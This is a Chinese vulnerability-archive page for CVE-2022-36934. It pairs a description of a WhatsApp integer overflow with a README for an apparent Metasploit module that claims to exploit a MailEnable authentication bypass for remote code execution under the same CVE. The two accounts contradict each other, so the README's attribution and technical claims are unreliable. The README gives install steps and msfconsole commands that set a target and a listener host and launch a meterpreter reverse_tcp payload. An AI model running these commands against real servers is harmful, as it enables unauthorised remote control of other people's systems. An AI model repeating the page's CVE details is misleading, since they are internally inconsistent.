目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2022-36934 PoC — WhatsApp 输入验证错误漏洞

来源
关联漏洞
标题: WhatsApp 输入验证错误漏洞 (CVE-2022-36934)
Description:WhatsApp是美国WhatsApp公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。 WhatsApp存在安全漏洞,该漏洞源于整数溢出,可能导致在已建立的视频通话中远程执行代码。
Description
Metasploit module for MailEnable CVE-2022-36934 authentication bypass RCE
介绍
# MailEnable CVE-2022-36934 Exploit Module

![Metasploit](https://img.shields.io/badge/Metasploit-Compatible-red)
![License](https://img.shields.io/badge/License-MIT-blue)

Metasploit module for MailEnable's authentication bypass vulnerability (CVE-2022-36934), leading to remote code execution.

## 📌 Features
- Exploits MailEnable's improper input sanitization in SMTP/POP3
- Supports both x86 and x64 Windows targets
- No user interaction required (auto-triggers via crafted email)
- Works against MailEnable versions < 10.40

## 🚀 Installation
1. Copy to Metasploit modules directory:
   ```bash
   cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/

2. Reload modules in msfconsole:

  reload_all

4. Usage:

  use exploit/windows/smtp/mailenable_authbypass_rce
  set RHOSTS <target_ip>
  set LHOST <your_ip>
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  exploit



  🎯 Tested Against:

  MailEnable Professional	10.25	Windows Server 2019
  MailEnable Enterprise	10.30	Windows Server 2016

📝 Technical Details:

  Vulnerability: Authentication bypass via SQLi-like syntax in SMTP/POP3

  Attack Vector: Network (ports 25/110)

  Privileges: Runs as MailEnable service account (often SYSTEM)
  
⚠️ Legal Disclaimer:

This tool is for authorized testing only. Never use against systems you don't own or have explicit permission to test.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →